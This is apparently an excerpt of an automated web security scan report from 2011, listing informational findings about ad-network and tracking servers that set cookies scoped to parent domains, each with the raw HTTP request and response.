Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146; u="aABnAskUA==AI89bBrQ==AAABLzpCpLs="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a2=8663496762294337265;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: j2=8663496762294337265;Path=/;Domain=.rfihub.com
Set-Cookie: t1=1302352537225;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: u="aABnAunNw==AI89bBrQ==AAABLzpCpoo=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:37 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:37 GMT
Set-Cookie: a=c369576644441445519;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: j=c369576644441445519;Path=/;Domain=.rfihub.com
Content-Type: image/gif
Set-Cookie: o=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: p=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529146;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

5.5. http://a.rfihub.com/sed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABMFwoTA==A-aAcXzUJ2ZpCiN|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCh6o=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: u="aABnActyg==AI89bBrQ==AAABLzpCh6k=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: f="aABnVZ4PA==AK1302352529AB1AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: s="aACqCxNPw==AE9479AN1294103956000AAABLzpCh6g=AE8438AN1275963655000AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: a=c369576644441445542;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: j=c369576644441445542;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-qI823taMvmm8;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: p=1-qI823taMvmm8;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529321;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Content-Length: 2760

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529320;click=h
...[SNIP]...

5.6. http://a.rfihub.com/tk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /tk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tk.gif?rb=445&re=12387&aa=9530,84152,12352,361230,824,10261,c0ldxTL_CNwb,http%3A%2F%2Frocketfuelinc.com,492,1249,38387,1279,6613&pa=ppre352525508247&id=&ra=3525276570.8074509229045361&ct=1302352527657 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; u="aABnAgfAg==AI89bBrQ==AAABLzpChvs="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; e=cd; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: u="aABnAm_Fg==AI89bBrQ==AAABLzpCn-0=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:35 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:35 GMT
Content-Type: image/gif
Content-Length: 42
Cache-Control: no-cache

GIF89a.............!.......,........@..D.;

5.7. http://a1.interclick.com/ColDta.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /ColDta.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=a53875b5-a877-4a03-ad1a-e28c70299475; ucap=sl=1; FC_51=113861=17621725:1; IFC=n=1&w13741=1&a113861=1&e=634382119927363227; Aqprep_Banner300X250=113861=634381255927393227:13741; Li=1=734237&30=734237; tpd=i20=&e20=1305135081313&i90=&e90=1303147881323&i50=&e50=1305135081318&i100=&e100=1303147881396

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1305135081313&e90=1303147881323&e50=1305135081318&e100=1303147881396; domain=.interclick.com; expires=Wed, 11-May-2011 17:33:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 11 Apr 2011 17:33:16 GMT

GIF89a.............!.......,...........D..;

5.8. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=4608069584519221037 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=rQ1Ia8xMj0KaI6M6V7+M3Q; s=1,2*4d9a32eb*X4TKR-a8TD*MbX-VAoK_2NCLHMLyLVahutgcQ==*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4d9a32eb*gNkbP117fj*Xk4nbYfLb776H4OdvScWOgThiQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

5.9. http://ad.doubleclick.net/adj/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.wcax/political

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/wn.loc.wcax/political;sz=850x30;wnsz=85;tile=1;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;apptype=platform;env=production;ord=81143749? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 09 Apr 2011 12:53:17 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 09 Apr 2011 12:38:17 GMT
Expires: Sat, 09 Apr 2011 12:38:17 GMT
Cache-Control: private
Content-Length: 1434

document.write('<!-- Template ID = 8688 Template Name = +WorldNow Pencil Pushdown: Images -->\n\n<!-- Template Id = 8688 Template Name = WorldNow Pencil Pushdown: Images -->\n<DIV align=center><A href
...[SNIP]...

5.10. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid=595414&bimpd=bvq28451foJSYWMGSWpGLm57PuP1ep3e8pYSpjMgXYBgzZsm_MD3Ph0_AT4tfqL1DmeJqXqoXz4419yIOhU5gOeJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-tlTKPEPwzWzLjcG0petCQ0kOZWgcTS_a_4u4oxn8pOmWjHRY6EBGuSwXwHGMEC0xL3dnura1cEVep9swAHPGcQgMIlGKLUwZcdE7RzNOB1XKprf8mRndDhhFf8Sdys88gdgxCVuolRLb7Z-3WuXH2eelAZ6GtOP-ASuDVvjj6Alva3C8QNQcmEuoh5hLm8UhVLPCQNQ1NJ6FtytBorXofoFtBivKRqgKwft45cpCMCxp949Lefsp8QsMgMdbB8_G407eUqjR_zXj68onFm3lvdZYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHHwOWv-gGYK-_EdRAynUJQc9OQ0JCH3IRRC2v9iFYyIGsJ_FzMFXQEDgUfSCtUSLiNCZslCDsmK2JC-xdJmz2cjfYrblFN1Vrq7tHBSJG_h8MbnZNh9bOlTF5VJxTMpf6PQwEcwTA1AnGV4Q2SYTL57oEC7wd4-ropmSQNL3Tn8jt_T370WDWWY1SqEwEJwbhIPZgphozREaBUNGGZK6KHTQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.027583195495811192 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15069%7C15069%7C15069%7C15069%7Cundefined%7C15069; rv=1; uid=4608069584519221037; pf=cu1FbtXKKpFof-hWjfkQRcVIkA_tbns9D4-b88MB0l6CH-nC-kQ69MLaDP7avFRDzd5xTtrRgn51HC41qoSB9_pqNLucEh96CCAoHJ73Ep-dCbxIubA9vJ0TJiztXY_3cxb2oDS_ZBeMeceweOTTRM5O3f8IMqs1jnadlyIx8Ew

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 11 Apr 2011 12:35:43 GMT
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=tmY-x8L_yowSJFqM0vF4Y8CuY9t_hBSzjQil7z33OlYpagDPKKctVczI9DEFcEkPcxpGHxRlubu1xR21Mxu4g-sHDXOosP1lwOMr_-ta2t973bvsD6p3TnXOe8vTPY4VFaT6eTBuV55JRFz8lx3PqdqozOSXNU0m0cAav4sZMCcTY1vGdjvt8S43nB6dS9OmxjcTGL1eKfAUVOMXIUnylA; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: fc=eFAOz3ilQ4gYIBtFIJGWAE5_UN3y883I71mcX_0aEuuubHizRKm2LPdnMwd17GsW3WQO872ou4xvEVRnVXW81PsHnm-jU8W9DeXq1d2r1JKkV1vPzSwkQiZJzLr4lAFo; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: pf=snK9kHUjEl1FaWKxPCEh1sJ8lErb_iSlHvQid9sfqYGDVsdGVkOFL386xes7a4VRH-w_0yHZxr5U-a1ULJAMKQRyElVn9VAUzXky4Bxf5K8hlcBpkm8Sg5-23YdyuJpz9_hZk2y4Lc1tg0PRNwxT__KovNH6HfPSeeybFLsgN_DN9JRYGQVWUbjEaPiKqkBr8AkkycJ0w6q2tbQDIXhSrAgkLZbHfwITF7RboAby-GXjYWEb1kaerphA9cWJarOLh_BwiBS09OfPB0I41L7nq5FuSGZvCDWT_YGlhDw-_9zGhvu2FiJEpdM7zDK0xqeWNUj9wzAaHETIIAZhDZgOW6C-zFUZM9OcnDkQKyl2S7I; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 10051


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

5.11. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:19 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');

5.12. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:19 GMT
Expires: Mon, 11 Apr 2011 16:31:19 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
